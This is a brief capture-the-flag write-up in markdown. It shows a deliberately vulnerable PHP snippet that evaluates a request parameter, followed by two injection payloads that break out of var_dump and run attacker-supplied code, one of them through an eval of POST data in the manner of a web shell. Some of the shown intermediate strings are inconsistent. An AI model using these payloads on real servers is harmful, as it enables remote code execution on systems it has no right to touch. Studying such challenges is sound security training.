Skip to content

Latest commit

 

History

History
44 lines (37 loc) · 665 Bytes

challenge-12.md

File metadata and controls

44 lines (37 loc) · 665 Bytes

Challenge

<?php 
error_reporting(0);
show_source(__FILE__);

$a = @$_REQUEST['hello'];
eval("var_dump($a);"); 

Solution

payload1

?hello=);eval($_POST['A']);%2f%2f

或

?hello=);eval(phpinfo());//

var_dump($a);后的结果为

string(22) ");eval($_POST['A']);//"

eval("string(21) ");eval($_GET['A']);//"");

payload2

?hello=);eval($_GET[c]&c=phpinfo();

var_dump()后的结果是

string(15) ");eval($_GET[c]"

eval("string(17) ");eval($_GET[c]" string(0) "" ");

Refference